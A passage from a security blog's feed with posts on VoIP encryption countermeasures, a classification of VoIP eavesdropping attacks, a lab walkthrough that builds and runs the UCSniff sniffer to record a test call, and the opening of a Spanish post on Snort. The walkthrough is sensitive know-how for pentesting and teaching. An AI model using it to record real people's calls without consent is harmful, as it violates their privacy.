/></span><br /><span class="Apple-style-span" style="font-family: inherit;">In this case we have some options too:</span><br /><span class="Apple-style-span" style="font-family: inherit;"><br /></span><br /><span class="Apple-style-span" style="font-family: inherit;">- <b>VPN</b>(<a href="http://en.wikipedia.org/wiki/Virtual_private_network">Virtual Private Network</a>): As you can see in the figure it is possible to cypher communications between different VoIP terminals of your system using a VPN, if all traffic is encrypted both SIP and RTP are also protected. This solution defends us from Internet sniffers but not inside the organization, this is the reason because a dedicated VLAN is also recommended in order to minimize data exposure. </span><br /><span class="Apple-style-span" style="font-family: inherit;"><br /></span><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-4FDoE9A-PQ4/TldsEnxV1uI/AAAAAAAAAVc/5hmtf6PxzUA/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="139" src="http://2.bp.blogspot.com/-4FDoE9A-PQ4/TldsEnxV1uI/AAAAAAAAAVc/5hmtf6PxzUA/s320/2.png" width="320" /></a></div><div style="text-align: center;"><span class="Apple-style-span" style="font-family: inherit; font-size: x-small;"><br /></span><br /><span class="Apple-style-span" style="font-family: inherit; font-size: x-small;">Figure: VPN example</span></div><div style="text-align: center;"><span class="Apple-style-span" style="font-family: inherit;"><br /></span></div><span class="Apple-style-span" style="font-family: inherit;">- <b>Built encryption</b>: Some proprietary software as <a href="http://www.skype.com/">Skype</a> uses its own cipher protocol, only understandable for Skype clients. Traffic is encrypted and <a href="http://en.wikipedia.org/wiki/Skype_protocol">protocol</a> relies on a P2P network formed for clients and nodes, but this architecture is too complex for resume it in a few words, so I recommend the lecture of these papers:</span><br /><span class="Apple-style-span" style="font-family: inherit;"><a href="http://www.linecity.de/INFOTECH_ACS_SS05/acs5_top1_paper.pdf">http://www.linecity.de/INFOTECH_ACS_SS05/acs5_top1_paper.pdf</a></span><br /><span class="Apple-style-span" style="font-family: inherit;"><a href="http://www.mjalali.com/blog/?p=10.">http://www.mjalali.com/blog/?p=10</a></span><br /><span class="Apple-style-span" style="font-family: inherit;">Anyway, I wouldn’t use it if I want a real secure communication because i can´t be sure if my conversation is not being transmitted using another Skype user computer(maybe a bad guy one).</span><br /><span class="Apple-style-span" style="font-family: inherit;"><br /></span><br /><span class="Apple-style-span" style="font-family: inherit;">- <b>“Standards” SRTP & ZRTP</b>: <b><a href="http://en.wikipedia.org/wiki/Secure_Real-time_Transport_Protocol">SRTP</a></b>(Secure Real Time Transport Protocol) cyphers <a href="http://es.wikipedia.org/wiki/Real-time_Transport_Protoco">RTP</a> traffic to provide encryption, message authentication and integrity and replay protection. It depends of an external key management protocol to set up the initial master key, there are some other protocols to do this task: <b><a href="http://en.wikipedia.org/wiki/MIKEY">MIKEY</a></b>, <a href="http://en.wikipedia.org/wiki/ZRTP"><b>ZRTP</b></a>(Media Path Key Agreement for Unicast Secure RTP) and <b><a href="http://en.wikipedia.org/wiki/SDES">SDES</a></b> which seems to become de facto standard, principally for being an extremely simple technique. Basically, in this method keys are transported in a SIP message (SDP attachment) and ciphered using TLS(<a href="http://en.wikipedia.org/wiki/Transport_Layer_Security">Transport Layer Security</a>), you can imagine it if you think in <a href="http://en.wikipedia.org/wiki/HTTP_Secure">HTTPS</a> protocol. Also it could be possible to use other methods to implement this last funcionality like <a href="http://es.wikipedia.org/wiki/S/MIME">S/MIME</a> but they are not too much widespread.</span><br /><span class="Apple-style-span" style="font-family: inherit;"><br /></span><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-oggWKsPmtkQ/TldsF7-j79I/AAAAAAAAAVg/rqW6hvBUgRw/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="147" src="http://3.bp.blogspot.com/-oggWKsPmtkQ/TldsF7-j79I/AAAAAAAAAVg/rqW6hvBUgRw/s320/3.png" width="320" /></a></div><span class="Apple-style-span" style="font-family: inherit;"><br /></span><br /><div style="text-align: center;"><span class="Apple-style-span" style="font-family: inherit; font-size: x-small;">Figure: TLS example</span></div><div style="text-align: center;"><br /></div><span class="Apple-style-span" style="font-family: inherit;">On the other hand, ZRTP was developed as part of <a href="http://zfoneproject.com/prod_zfone.html">Zfone Project</a> and its most important advantage is the only able to provide <a href="http://en.wikipedia.org/wiki/End-to-end_encryption">end-to-end encryption</a>. Even SIP/TLS does not provide it because being the <a href="http://en.wikipedia.org/wiki/IP_PBX">IP PBX</a> a trusted third party which could be able to eavesdrop the conversation. Other benefits of this protocol:</span><br /><span class="Apple-style-span" style="font-family: inherit;">- It uses a <a href="http://en.wikipedia.org/wiki/Public-key_cryptography">public key algorithm</a> avoiding <a href="http://en.wikipedia.org/wiki/Public_key_infrastructure">PKI</a>(Public Key Infrastructure) complexity.</span><br /><span class="Apple-style-span" style="font-family: inherit;">- It allows the detection of man-in-the-middle (MiTM) attacks, as commented before.</span><br /><span class="Apple-style-span" style="font-family: inherit;">- It supports <a href="http://en.wikipedia.org/wiki/Opportunistic_encryption">opportunistic encryption</a> asking the other VoIP client if supports ZRTP before starting a call.</span><br /><span class="Apple-style-span" style="font-family: inherit;"><br /></span><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-aQDcX2xpMbI/TldsHaJkk2I/AAAAAAAAAVk/dr_BpEaFa7E/s1600/4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="229" src="http://1.bp.blogspot.com/-aQDcX2xpMbI/TldsHaJkk2I/AAAAAAAAAVk/dr_BpEaFa7E/s320/4.jpg" width="320" /></a></div><span class="Apple-style-span" style="font-family: inherit;"><br /></span><br /><div style="text-align: center;"><span class="Apple-style-span" style="font-family: inherit; font-size: x-small;">Figure: Detailed SRTP generic communication</span></div><div style="text-align: center;"><span class="Apple-style-span" style="font-family: inherit;"><br /></span></div><span class="Apple-style-span" style="font-family: inherit;">NOTE: Eavesdropping through ZRTP protocol seems extremely difficult, but not impossible. To do this, an attacker would have to be present since the first call, be able to fake verbal <a href="http://www.audiocodes.com/glossary/sas">SAS</a> in real time and, preferably, to imitate voices. (Detailed explanation <a href="http://voipsa.org/blog/2006/06/19/a-tour-through-zfone/">here</a>)</span><br /><span class="Apple-style-span" style="font-family: inherit;"><br /></span><br /><span class="Apple-style-span" style="font-family: inherit;">They are not exactly standards but they are the most used option, in fact, SRTP(<a href="http://tools.ietf.org/html/rfc4585">RFC4585</a>)</span> and MIKEY (<a href="http://tools.ietf.org/html/rfc4738">RFC4738</a>) are “Proposed standard” and ZRTP is an “Informational standard”. It was developed by <a href="http://en.wikipedia.org/wiki/Phil_Zimmermann">Phil Zimmermann</a> (among others) and published by <a href="http://en.wikipedia.org/wiki/Internet_Engineering_Task_Force)(Internet%20Engineering%20Task%20Force">IETF</a> recently as <a href="http://tools.ietf.org/html/rfc6189">RFC 6189</a>.<br /><span class="Apple-style-span" style="font-family: inherit;"><br /></span><br /><span class="Apple-style-span" style="font-family: inherit;">Ok, this is a real mess of protocols, but now, what hardware and software solution would I get? You should choose what level of risk you want to assume, and then select software that supports it, I think this comparative list can help you:</span><br /><a href="http://en.wikipedia.org/wiki/Comparison_of_VoIP_software">http://en.wikipedia.org/wiki/Comparison_of_VoIP_software</a><br /><span class="Apple-style-span" style="font-family: inherit;"><br /></span><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-TzLmEiAeUJg/TldyfO_fZ1I/AAAAAAAAAVo/SNy8pxUYqn8/s1600/T_Ekiga_in_a_Call.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://1.bp.blogspot.com/-TzLmEiAeUJg/TldyfO_fZ1I/AAAAAAAAAVo/SNy8pxUYqn8/s320/T_Ekiga_in_a_Call.png" width="281" /></a></div><div style="text-align: center;"><span class="Apple-style-span" style="font-family: inherit; font-size: x-small;">Figure: Ekiga client </span></div><div style="text-align: center;"><span class="Apple-style-span" style="font-family: inherit;"><br /></span></div><span class="Apple-style-span" style="font-family: inherit;">To sum up I should to say I know this was a bored(sorry for that) theoretical post, but I found a lot of confusion in too many sites and forums among this group of protocols and what they can do for us, so I decided deep in and document it. From now I will come back to work on proofs of concept which are much more funny to test, write and read :)</span><br /><span class="Apple-style-span" style="font-family: inherit;"><br /></span><br /><div style="text-align: right;"><span class="Apple-style-span" style="font-family: inherit;">Jesús Pérez</span></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7743819158194184549-8783067665673870197?l=nicerosniunos.blogspot.com' alt='' /></div>Jesús Pérezhttp://www.blogger.com/profile/09565740223441207640noreply@blogger.com0tag:blogger.com,1999:blog-7743819158194184549.post-22356360360984584732011-08-17T22:05:00.003+02:002012-02-11T18:14:51.045+01:00VoIP Eavesdropping: UCSniff (II)<span class="Apple-style-span" style="font-family: inherit;"><a href="http://www.google.com/url?q=http%3A%2F%2Fnicerosniunos.blogspot.com%2F2011%2F08%2Fvoip-eavesdropping-ucsniff-i.html"> VoIP Eavesdropping: UCSniff (I)</a></span><br /><span class="Apple-style-span" style="font-family: inherit;"><br /></span><br /><span class="Apple-style-span" style="font-family: inherit;">To start this second article I'll dig a little deeper in VoIP Eavesdropping techniques. </span>There are different classifications over the net but I´m going to use <a href="http://www.hackingvoip.com/">"Hacking Exposed VoIP"</a> book (I strongly recommend it) one for being , in my opinion, the most complete. According to it we define four categories for these attacks:<br /><br /><span class="Apple-style-span" style="font-family: inherit;"><b>TFTP Configuration File Sniffing</b></span><br />IP phones often obtain their configuration parameters from a TFTP server, you can get an idea imagining something similar to DHCP Protocol, but in application layer of course. In this case attacker could obtain some passwords sniffing or downloading them directly from ftp server, moreover he could even reconfigure phone. In fact I have a fun idea in mind for another POC but we are waiting for someone to lend us a proper phone :).<br /><br /><span class="Apple-style-span" style="font-family: inherit;"><b>Number Harvesting</b></span><br />Attacker monitors all calls in order to obtain legitimate numbers and extensions of a system which will be used combined with other attacks.<br /><br /><span class="Apple-style-span" style="font-family: inherit;"><b>Call Pattern Tracking </b></span><br />The attack target is the list with all the calls made by a member of an organization in order to detect suspicious activities among the members.<br /><br /><b>Conversation Eavesdropping and Analysis</b><br />This is the most impressive attack because the bad guy try to record both sides of conversations.<br /><br />That being said, now I´m going to show <a href="http://ucsniff.sourceforge.net/">UCSniff</a> automates the attacks studying results obtained from <a href="http://www.google.com/url?q=http%3A%2F%2Fnicerosniunos.blogspot.com%2F2011%2F08%2Fvoip-eavesdropping-ucsniff-i.html">last post</a>. Next picture shows files generated after the sniffing.<br /><br /><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-RLuRG4csXng/TkwatAkDTfI/AAAAAAAAAU4/iZ095ToDNDM/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="239" src="http://3.bp.blogspot.com/-RLuRG4csXng/TkwatAkDTfI/AAAAAAAAAU4/iZ095ToDNDM/s320/1.png" width="320" /></a></div><div style="text-align: center;"><span class="Apple-style-span" style="font-family: inherit; font-size: x-small;">Figure: Generated files</span></div><div style="text-align: center;"><br /></div><span class="Apple-style-span" style="font-family: inherit;"><b>TFTP Configuration File Sniffing</b> </span><br />As I said before I do not have a proper phone for this test, but UCSniff supports it, even TFTP Modify Attack (cursiva) as you can see in the picture.<br /><span class="Apple-style-span" style="font-family: inherit;"><br /></span><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-GRLtLhbl0yk/TkwbYVRj62I/AAAAAAAAAVE/x1raH7COtBs/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="245" src="http://2.bp.blogspot.com/-GRLtLhbl0yk/TkwbYVRj62I/AAAAAAAAAVE/x1raH7COtBs/s320/2.png" width="320" /></a></div><div style="text-align: center;"><span class="Apple-style-span" style="font-family: inherit; font-size: x-small;">Figure: TFTP Modify Attack</span></div><span class="Apple-style-span" style="font-family: inherit;"><br /></span><br /><span class="Apple-style-span" style="font-family: inherit;"><b>Number Harvesting</b></span><br />During the sniffing we could see extensions involved in calls on the Output and Status(cursiva) panel. Now we can consult them in <i>call.log</i>, <i>calldetail.log</i> and <i>sip.log</i> , which also stores it with much more detailed log including all SIP messages (<i>REGISTER</i>, <i>INVITE</i>, etc.)<br /><span class="Apple-style-span" style="font-family: inherit;"><br /></span><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-56l8aNkKcps/Tkwbh9uy8NI/AAAAAAAAAVI/1nSOOpG_xZE/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="104" src="http://2.bp.blogspot.com/-56l8aNkKcps/Tkwbh9uy8NI/AAAAAAAAAVI/1nSOOpG_xZE/s320/3.png" width="320" /></a></div><div style="text-align: center;"><span class="Apple-style-span" style="font-family: inherit; font-size: x-small;">Figure: Detailed call list</span></div><div style="text-align: center;"><span class="Apple-style-span" style="font-family: inherit;"><br /></span></div><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-QPV4uIapqlw/Tkwbpk-OGVI/AAAAAAAAAVM/wF0MvjcAbwM/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="235" src="http://4.bp.blogspot.com/-QPV4uIapqlw/Tkwbpk-OGVI/AAAAAAAAAVM/wF0MvjcAbwM/s320/4.png" width="320" /></a></div><div style="text-align: center;"><span class="Apple-style-span" style="font-family: inherit; font-size: x-small;">Figure: INVITE from sip.log </span></div><div style="text-align: center;"><br /></div><span class="Apple-style-span" style="font-family: inherit;"><b>Call Pattern Tracking</b></span><br />Files commented in Number Harvesting cover this point too.<br /><br /><span class="Apple-style-span" style="font-family: inherit;"><b>Conversation Eavesdropping and Analysis</b></span><br />In this example <i>81-Calling-81-18:48:12-3-reverse.wav</i> stores one side conversation for the reasons commented in previous post, but in a real environment we should get something like this:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-R0UglB3iWX4/TkwcIzvn4hI/AAAAAAAAAVQ/8XEwvDNAGKg/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="121" src="http://2.bp.blogspot.com/-R0UglB3iWX4/TkwcIzvn4hI/AAAAAAAAAVQ/8XEwvDNAGKg/s320/5.png" width="320" /></a></div><div style="text-align: center;"><span class="Apple-style-span" style="font-family: inherit; font-size: x-small;">Figure: Generated <i>.wavs</i> in real example</span></div><div style="text-align: center;"><span class="Apple-style-span" style="font-family: inherit;"><br /></span></div><span class="Apple-style-span" style="font-family: inherit;">Names are really intuitive so, at this point, I think you can understand by yourself all the helpfull information included in other generated files, you can ask me any doubt in a comment or a mail :). In the next post I hope talk about countermesurements porposed for protect a infrastruture against this kind of Eavesdropping attack.</span><br /><span class="Apple-style-span" style="font-family: inherit;"><br /></span><br /><div style="text-align: right;"><span class="Apple-style-span" style="font-family: inherit;">Jesús Pérez</span></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7743819158194184549-2235636036098458473?l=nicerosniunos.blogspot.com' alt='' /></div>Jesús Pérezhttp://www.blogger.com/profile/09565740223441207640noreply@blogger.com0tag:blogger.com,1999:blog-7743819158194184549.post-79702591719622335902011-08-05T16:30:00.065+02:002012-02-11T18:15:14.537+01:00VoIP Eavesdropping: UCSniff (I)<span class="Apple-style-span" style="color: #444444;">After a long time without writing because of different reasons I´m going to begin a group of articles trying to cover different type of attacks against any of the components of a common <a href="http://en.wikipedia.org/wiki/Voice_over_Internet_Protocol">VoIP</a> (Voice Over Internet Protocol) infrastructure and how to stop them. If you are beginning in this world of VoIP I recommend you to read <a href="http://www.google.es/search?sourceid=chrome&ie=UTF-8&q=building+telephony+systems+with+opensips+1.6"><i>Building Telephony Systems with OpenSIPS 1.</i>6</a> where the authors go through basic theoretical and practical skills needed to implement a complete system.</span><br /><span class="Apple-style-span" style="color: #444444;"><br /></span><br /><span class="Apple-style-span" style="color: #444444;">T</span><span class="Apple-style-span" style="color: #444444;">his time, I will start with VoIP <a href="http://es.wikipedia.org/wiki/Eavesdropping">Eavesdropping</a> attack, as the name suggest it consists on listen a conversation without speakers consent. This attack existed in the traditional telephony systems and nowadays is also possible against VoIP ones (and other protocols too, in example bluetooth).</span><br /><div><span class="Apple-style-span" style="color: #444444;"><br /></span></div><div><div><span class="Apple-style-span" style="color: #444444;">As you can imagine we are in front of a classic sniffing attack so, first of all, we need to gain access. Any of the techniques you know are ok, moreover, there are another specific ways for this kind of systems of getting the <i>.pcap</i> file we are looking for. For example, some phones have a "feature" which allows saving a <i>.pcap</i> with all traffic passing over its interfaces and more of them have vulnerabilities in their web control panel, so it could be possible to access to this profitable file :). But this is not the topic of this article despite of being an interesting one too, so I hope take it up again another day.</span></div><div><span class="Apple-style-span" style="color: #444444;"><br /></span></div><div><span class="Apple-style-span" style="color: #444444;">Now we have the capture, then we need a tool able to understand <a href="http://es.wikipedia.org/wiki/Session_Initiation_Protocol">SIP</a> (Session Initiation Protocol) and <a href="http://es.wikipedia.org/wiki/Real-time_Transport_Protocol">RTP</a> (Real-time Transport Protocol), among others. The most used option is <a href="http://www.wireshark.org/">Whireshark</a>, but <a href="http://wiki.wireshark.org/VOIPProtocolFamily">it doesn´t support H.264 video codec</a> so we can´t eavesdrop video conversations, in this case we should call it IP Video Eavesdropping not VoIP Eavesdropping. I found this video where we can see an example of this:</span></div></div><div><span class="Apple-style-span" style="color: #444444;"><br /></span></div><div class="separator" style="clear: both; text-align: center;"><span class="Apple-style-span" style="color: #444444;"><object class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://3.gvt0.com/vi/K6rvhjt_HvM/0.jpg" height="266" width="320"><param name="movie" value="http://www.youtube.com/v/K6rvhjt_HvM&fs=1&source=uds" /><param name="bgcolor" value="#FFFFFF" /><embed width="320" height="266" src="http://www.youtube.com/v/K6rvhjt_HvM&fs=1&source=uds" type="application/x-shockwave-flash"></embed></object></span></div><div><div style="text-align: center;"><span class="Apple-style-span" style="color: #444444; font-size: x-small;"><a href="http://www.youtube.com/watch?v=K6rvhjt_HvM&feature=player_embedded">Video: Conversation Eavesdropping with Wireshark</a></span></div><div style="text-align: center;"><span class="Apple-style-span" style="color: #444444;"><br /></span></div><div style="text-align: left;"><span class="Apple-style-span" style="color: #444444;">I like Wireshark for studying specific situations but, anyway, we need something more automatic for pentesting tests in order to be capable of reconstruct and synchronize conversations correctly. I usually use <a href="http://www.xplico.org/">Xplico</a> for this kind of things but, for the moment, SIP, SDP and RTP protocol are not fully supported as we can see in the website:</span></div></div><div style="text-align: left;"><span class="Apple-style-span" style="color: #444444;"><br /></span></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-giptSwac1Bg/Tjv1ns2r9ZI/AAAAAAAAAP8/rgNBDjlzeDA/s1600/0.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="color: #444444;"><img border="0" height="320" src="http://1.bp.blogspot.com/-giptSwac1Bg/Tjv1ns2r9ZI/AAAAAAAAAP8/rgNBDjlzeDA/s320/0.png" width="278" /></span></a></div><div style="text-align: left;"><div style="text-align: center;"><span class="Apple-style-span" style="color: #444444; font-size: x-small;">Figure: Xplico supported protocols state </span></div><div style="text-align: center;"><span class="Apple-style-span" style="color: #444444;"><br /></span></div><div style="text-align: left;"><span class="Apple-style-span" style="color: #444444;">Today we will use <a href="http://ucsniff.sourceforge.net/index.html">UCSniff</a>, a tool which allows to rapidly test for the threat of unauthorized VoIP and Video Eavesdropping. I paste here some features:</span></div><div style="text-align: left;"><span class="Apple-style-span" style="color: #444444;">- Audio Eavesdropping</span></div><div style="text-align: left;"><span class="Apple-style-span" style="color: #444444;">- Video Eavesdropping (creates H.264 format file)</span></div><div style="text-align: left;"><span class="Apple-style-span" style="color: #444444;">- Realtime Audio Monitor</span></div><div style="text-align: left;"><span class="Apple-style-span" style="color: #444444;">- GUI Support</span></div><div style="text-align: left;"><span class="Apple-style-span" style="color: #444444;">- Realtime Video Monitor</span></div><div style="text-align: left;"><span class="Apple-style-span" style="color: #444444;">- Creates an avi file and muxes audio and video</span></div><div style="text-align: left;"><span class="Apple-style-span" style="color: #444444;">- Creates a wav file and muxes both forward and reverse audio</span></div><div style="text-align: left;"><span class="Apple-style-span" style="color: #444444;"><br /></span></div><div style="text-align: left;"><span class="Apple-style-span" style="color: #444444;">For this POC (Proof Of Concept) I will use two virtual machines, one with <a href="http://www.backtrack-linux.org/">BT</a> (Backtrack) 5 and <a href="http://www.zoiper.com/download_list.php">Zoiper Classic</a> as client (I had problems running Ekiga on BT5) and another with a Debian Squeeze with a basic installation of <a href="http://www.asterisk.org/">Asterisk</a>. It is not a very real environment but it´s enough for this POC, so we don´t need to do <a href="http://en.wikipedia.org/wiki/Man-in-the-middle_attack">MitM</a> (Main in the Middle). I’m sure if you are reading this you know how to gain access with you favorite sniffer or UCSniff ;).</span></div><div style="text-align: left;"><span class="Apple-style-span" style="color: #444444;"><br /></span></div><div style="text-align: left;"><span class="Apple-style-span" style="color: #444444;">OK, first we need to download the latest version of UCSniff (<a href="http://sourceforge.net/projects/ucsniff/files/ucsniff/ucsniff-3.1%20src/">here</a>) and to install dependencies to compile it on BT5 with GUI (Graphical User Interface) and realtime video monitor:</span></div><div style="text-align: left;"><span class="Apple-style-span" style="color: #444444;"><br /></span></div><div style="text-align: left;"><i><span class="Apple-style-span" style="color: #444444;">apt-get install build-essential zlib1g-dev liblzo2-dev libpcap0.8-dev libnet1-dev libasound2-dev libbz2-dev libncurses5-dev apt-get install libx11-dev libxext-dev libfreetype6-dev</span></i></div><div style="text-align: left;"><span class="Apple-style-span" style="color: #444444;"><br /></span></div><div style="text-align: left;"><span class="Apple-style-span" style="color: #444444;">NOTE: VLC version and development libraries included in BT5 broke the compilation, so we have to install it directly from VLC repositories before:</span></div><div style="text-align: left;"><span class="Apple-style-span" style="color: #444444;"><br /></span></div><div style="text-align: left;"><i><span class="Apple-style-span" style="color: #444444;">add-apt-repository ppa:lucid-bleed/ppa</span></i></div><div style="text-align: left;"><i><span class="Apple-style-span" style="color: #444444;">apt-get update</span></i></div><div style="text-align: left;"><i><span class="Apple-style-span" style="color: #444444;">apt-get install vlc libvlc-dev</span></i></div><div style="text-align: left;"><span class="Apple-style-span" style="color: #444444;"><br /></span></div><div style="text-align: left;"><span class="Apple-style-span" style="color: #444444;">Now, go in ucsniff-3.0 folder and compile it:</span></div><div style="text-align: left;"><span class="Apple-style-span" style="color: #444444;"><br /></span></div><div style="text-align: left;"><i><span class="Apple-style-span" style="color: #444444;">./configure --enable-libvlc --enable-gui</span></i></div><div style="text-align: left;"><i><span class="Apple-style-span" style="color: #444444;">make</span></i></div><div style="text-align: left;"><i><span class="Apple-style-span" style="color: #444444;">make install</span></i></div><div style="text-align: left;"><span class="Apple-style-span" style="color: #444444;"><br /></span></div><div style="text-align: left;"><span class="Apple-style-span" style="color: #444444;">We are ready for run it (graphical interface) for the first time:</span></div><div style="text-align: left;"><span class="Apple-style-span" style="color: #444444;"><br /></span></div><div style="text-align: left;"><i><span class="Apple-style-span" style="color: #444444;">ucsniff -G</span></i><br /><i><span class="Apple-style-span" style="color: #444444;"><br /></span></i></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-IUxqeac29NQ/Tjv1zfqYgdI/AAAAAAAAAQA/UT6z2MbWhrg/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="color: #444444;"><img border="0" height="269" src="http://2.bp.blogspot.com/-IUxqeac29NQ/Tjv1zfqYgdI/AAAAAAAAAQA/UT6z2MbWhrg/s320/1.png" width="320" /></span></a></div><div style="text-align: center;"><span class="Apple-style-span" style="color: #444444; font-size: x-small;">Figure: UCSniff general view</span></div><div style="text-align: center;"><span class="Apple-style-span" style="color: #444444;"><br /></span></div><div style="text-align: left;"><span class="Apple-style-span" style="color: #444444;">Yes, it´s not too sexy, above all these evil buttons! xD. For this test we have to select <i>Monitor Mode</i> and <i>Start Sniffing</i> like in the picture and the sniffer will start to capture. Next step is making a call, I will call myself (yes, it´s possible! you should try it :D).</span></div><div style="text-align: center;"><span class="Apple-style-span" style="color: #444444; font-size: x-small;"><br /></span></div><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-rCiNxU5GW6g/Tjv11s6Bq3I/AAAAAAAAAQE/eZs_D3xYNX8/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="color: #444444;"><img border="0" height="269" src="http://4.bp.blogspot.com/-rCiNxU5GW6g/Tjv11s6Bq3I/AAAAAAAAAQE/eZs_D3xYNX8/s320/2.png" width="320" /></span></a></div><div style="text-align: center;"><span class="Apple-style-span" style="font-size: x-small;"><span class="Apple-style-span" style="color: #444444;">Figure: Calling myself</span></span></div><div style="text-align: center;"></div><div style="text-align: left;"><span class="Apple-style-span" style="color: #444444;"><br /></span><br /><span class="Apple-style-span" style="color: #444444;">After accepting the incoming <i>Output Console</i> will log it as in the next two pictures (second took after hang up from one side).</span></div><div style="text-align: left;"><span class="Apple-style-span" style="color: #444444;"><br /></span></div><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-3xOr0ret1ak/Tjv13KdT7WI/AAAAAAAAAQI/Nz7wptqTbP4/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="color: #444444;"><img border="0" height="269" src="http://3.bp.blogspot.com/-3xOr0ret1ak/Tjv13KdT7WI/AAAAAAAAAQI/Nz7wptqTbP4/s320/4.png" width="320" /></span></a></div><div class="separator" style="clear: both; text-align: center;"><span class="Apple-style-span" style="color: #444444;"><br /></span></div><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-1qLLsw82f9Q/Tjv14_mpXnI/AAAAAAAAAQM/FYqyLqpDYdI/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="color: #444444;"><img border="0" height="272" src="http://4.bp.blogspot.com/-1qLLsw82f9Q/Tjv14_mpXnI/AAAAAAAAAQM/FYqyLqpDYdI/s320/5.png" width="320" /></span></a></div><div class="separator" style="clear: both; text-align: center;"><span class="Apple-style-span" style="font-size: x-small;"><span class="Apple-style-span" style="color: #444444;">Figure: Logging calls</span></span></div><div style="text-align: center;"><span class="Apple-style-span" style="color: #444444;"><br /></span></div><div style="text-align: left;"><span class="Apple-style-span" style="color: #444444;">Well done!, we can see the conversation was captured, there are two calls instead of only one because of virtual machine interface really is mapped to another, but it works, one of this two .wav will be empty and the other will contain saved conversation. I think it´s enough for the first day. Next article we will review all the outputs produced by the sniffer and we are going to deep a bit more in this attack. At the moment, I recommend you visiting the site of the tool where you can learn more about it and view examples using the GUI with MitM and Video Eavesdropping: <a href="http://ucsniff.sourceforge.net/guiusage.html">http://ucsniff.sourceforge.net/guiusage.html</a></span></div><div style="text-align: left;"><span class="Apple-style-span" style="color: #444444;"><br /></span></div><div class="separator" style="clear: both; text-align: center;"><a href="http://ucsniff.sourceforge.net/images/screenshots/livemonitor1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="color: #444444;"><img border="0" height="200" src="http://ucsniff.sourceforge.net/images/screenshots/livemonitor1.png" width="320" /></span></a></div><div style="text-align: center;"><span class="Apple-style-span" style="color: #444444; font-size: x-small;">Figure: UCSniff Video Eavesdropping</span></div><div style="text-align: center;"><span class="Apple-style-span" style="color: #444444;"><br /></span></div><div style="text-align: left;"><span class="Apple-style-span" style="color: #444444;"><br /></span></div><div style="text-align: right;"><span class="Apple-style-span" style="color: #444444;">Jesús Pérez</span></div></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7743819158194184549-7970259171962233590?l=nicerosniunos.blogspot.com' alt='' /></div>Jesús Pérezhttp://www.blogger.com/profile/09565740223441207640noreply@blogger.com0tag:blogger.com,1999:blog-7743819158194184549.post-60476128612788486962011-03-02T13:08:00.009+01:002012-02-11T18:16:13.015+01:00¿Por qué utilizar un IDS?: Un caso real con Snort<div><div><a href="http://nicerosniunos.blogspot.com/2011/01/snort-for-dummies-insta-snort.html">En un artículo anterior</a> expliqué como instalar de forma sencilla un sistema de detección de intrusos (IDS), más concretamente <a href="http://www.snort.org/">Snort</a> con la interfaz <a href="http://snorby.org/">Snorby</a>. Hoy voy a mostrar la potencia de este tipo de aplicaciones a través de un ejemplo que me encontré en mi trabajo como consultor.<br />Para situarnos un poco imaginemos una PYME sin ningún responsable del área de sistemas, como muchas en España. Cuando llegas tardas un tiempo en conocer el funcionamiento de todo el sistema (ya que no hay una persona a quien consultarle las dudas) y un IDS ayuda mucho en esta tarea detectando anomalías en el tráfico de red de la organización.<br /><br /></div><a href="http://1.bp.blogspot.com/-w3YnpXH-nes/TW46KvZSi_I/AAAAAAAAAK4/jIkhdTPt9A4/s1600/1.png"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5579460944554265586" src="http://1.bp.blogspot.com/-w3YnpXH-nes/TW46KvZSi_I/AAAAAAAAAK4/jIkhdTPt9A4/s400/1.png" style="cursor: pointer; display: block; height: 387px; margin-bottom: 10px; margin-left: auto; margin-right: auto; margin-top: 0px; text-align: center; width: 400px;" /></a></div><div><div style="text-align: center;"><span class="Apple-style-span"><u><br /></u></span></div><a 